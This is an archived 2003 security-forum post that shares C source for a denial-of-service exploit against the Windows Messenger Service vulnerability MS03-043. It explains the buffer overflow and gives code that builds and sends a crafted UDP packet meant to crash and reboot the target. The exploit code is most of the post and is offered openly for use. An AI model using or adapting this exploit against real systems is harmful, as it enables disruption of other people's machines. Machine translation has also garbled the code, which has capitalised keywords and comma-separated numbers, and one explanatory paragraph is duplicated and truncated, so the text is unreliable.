Messengeroverflow

Full Version: Messengeroverflow_ms03-043.c

GovernmentSecurity.org > The Archives > Public Downloads

wicked

Nov 18 2003, 11:40 PM

MessengerOverflow_ms03-043.c

Submits the time: 2003-10-21
Submits the user:Dav1d
Tool classification: Attack procedure
Movement platform: Windows
Tool size: 5,699 Bytes
Document MD5: 0e504611d9d217cef084befbb7e528b8
Tool origin:Http://www.dav1d.org

In yesterday passed on MessengerOverflow (MS03-043) c the typesetting had the mistake, caused to be unable to transmit the correct packet package,
Asks the manager to replace! !
The new document joins #pragma comment (lib, "ws2_32.lib"), may directly translate successfully.
To inconvenient which creates, I express extremely the apology!

Family of the security: :Dav1d
Http://www.dav1d.org

DoS Proof of Concept for MS03-043

Exploitation shouldn't be
too hard. Launching it one or two times against the target should make
the machine reboot. Tested against a Win2K SP4.

"The vulnerability results because the Messenger Service does
not properly validate the length of a message before passing it to the
allocated buffer" according to MS bulletin. Digging into it a bit
more, we find that when a character 0x14 in encountered in the 'body'
part of the message, it is replaced by a CR+LF. The buffer allocated
for this operation is twice the size of the string, which is the way
to go, but

DoS Proof of Concept for MS03-043 - exploitation shouldn't be
too hard. Launching it one or two times against the target should make
the machine reboot. Tested against a Win2K SP4.

"The vulnerability results because the Messenger Service does
not properly validate the length of a message before passing it to the
allocated buffer" according to MS bulletin. Digging into it a bit
more, we find that when a character 0x14 in encountered in the 'body'
part of the message, it is replaced by a CR+LF. The buffer allocated
for this operation is twice the size of the string, which is the way
to go, but is then copied to a buffer which was only allocated 11CAh
bytes. Thanks to that, we can bypass the length checks and overflow
the fixed size buffer.

Credits go to LSD:)

Author: Hanabishi Recca recca@mail.ru

Modified: Dav1d homepage: Http://www.dav1d.org

Translates successfully under VC++, has joined: #pragma comment
(lib, "ws2_32.lib") goal ip please voluntarily revises

CODE

*/

#include <stdio.h> #include <winsock.h> #include <string.h>
#include <time.h>

#pragma comment (lib, "ws2_32.lib") /* this cannot be few. */

// Packet format found thanks to a bit a sniffing static
unsigned char packet_header [ ] = "\x04\x00\x28\x00"
"\x10\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00\x00\x00\xf8\x91\x7b\x5a\x00\xff\xd0\x11\xa9\xb2\x00\xc0"
"\x4f\xb6\xe6\xfc" "\xff\xff\xff\xff" // @40: Unique id over 16 bytes?
"\xff\xff\xff\xff" "\xff\xff\xff\xff" "\xff\xff\xff\xff"
"\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00\xff\xff\xff\xff" "\xff\xff\xff\xff" // @74: Fields length
"\x00\x00";

Unsigned char field_header [ ] = "\xff\xff\xff\xff" // @0: Field
length "\x00\x00\x00\x00" "\xff\xff\xff\xff"; // @8: Field length

Int main (int argc, char *argv [ ]) {int i, packet_size,
fields_size, s; Unsigned char packet [ 8,192 ]; Struct sockaddr_in
addr; // A few conditions: // 0 <= strlen (from) + strlen (machine) <=
56 // max fields size 3,992 char from [ ] = "RECCA"; Char machine [ ]
= "ZEUS"; Char body [ 4,096 ] = "*** MESSAGE ***";

WSADATA wsaData;

WSAStartup (0x0202, &wsaData);

ZeroMemory (&addr, sizeof (addr)); Addr.sin_family = AF_INET;
Addr.sin_addr.s_addr = inet_addr ("192.168.186.3"); Addr.sin_port =
htons (135);

ZeroMemory (packet, sizeof (packet)); Packet_size = 0;

Memcpy (&packet [ packet_size ], packet_header, sizeof (packet_header)
- 1); Packet_size += sizeof (packet_header) - 1;

I = strlen (from) + 1; * (unsigned int *) (&field_header [ 0 ]) = i; *
(unsigned int *) (&field_header [ 8 ]) = i; Memcpy (&packet [
packet_size ], field_header, sizeof (field_header) - 1); Packet_size
+= sizeof (field_header) - 1; Strcpy (&packet [ packet_size ], from);
Packet_size += (((i - 1) >> 2) + 1) << 2; // padded to a multiple of
4

I = strlen (machine) + 1; * (unsigned int *) (&field_header [
0 ]) = i; * (unsigned int *) (&field_header [ 8 ]) = i; Memcpy
(&packet [ packet_size ], field_header, sizeof (field_header) - 1);
Packet_size += sizeof (field_header) - 1; Strcpy (&packet [
packet_size ], machine); Packet_size += (((i - 1) >> 2) + 1) << 2; //
padded to a multiple of 4

Fprintf (stdout, "Max 'body' size (incl. terminal NULL char) =
%d\n", 3,992 - packet_size + sizeof (packet_header) - sizeof
(field_header)); Memset (body, 0x14, sizeof (body)); Body [ 3,992 -
packet_size + sizeof (packet_header) - sizeof (field_header) - 1 ] =
'\0';

I = strlen (body) + 1; * (unsigned int *) (&field_header [ 0 ]) = i; *
(unsigned int *) (&field_header [ 8 ]) = i; Memcpy (&packet [
packet_size ], field_header, sizeof (field_header) - 1); Packet_size
+= sizeof (field_header) - 1; Strcpy (&packet [ packet_size ], body);
Packet_size += i;

Fields_size = packet_size - (sizeof (packet_header) - 1); * (unsigned
int *) (&packet [ 40 ]) = time (NULL); * (unsigned int *) (&packet [
74 ]) = fields_size;

Fprintf (stdout, "Total length of strings = %d\nPacket size =
%d\nFields size = %d\n", strlen (from) + strlen (machine) + strlen
(body), packet_size, fields_size);

/* for (i = 0; I < packet_size; I++) {if (i && ((i & 1) == 0)) fprintf
(stdout, ""); If (i && ((i & 15) == 0)) fprintf (stdout, "\n");
Fprintf (stdout, "%02x", packet [ i ]); } fprintf (stdout, "\n"); */
if ((s = socket (AF_INET, SOCK_DGRAM, IPPROTO_UDP)) == -1) exit
(EXIT_FAILURE);

If (sendto (s, packet, packet_size, 0, (struct sockaddr *) &addr,
sizeof (addr)) == -1) exit (EXIT_FAILURE); /* if (recvfrom (s, packet,
sizeof (packet) - 1, 0, NULL, NULL) == -1) exit (EXIT_FAILURE); */

Exit (EXIT_SUCCESS); }

Enjoy!

Wkd..

.../

This is a "lo-fi" version of our main content. To view the full version with more information, formatting and images, please click here.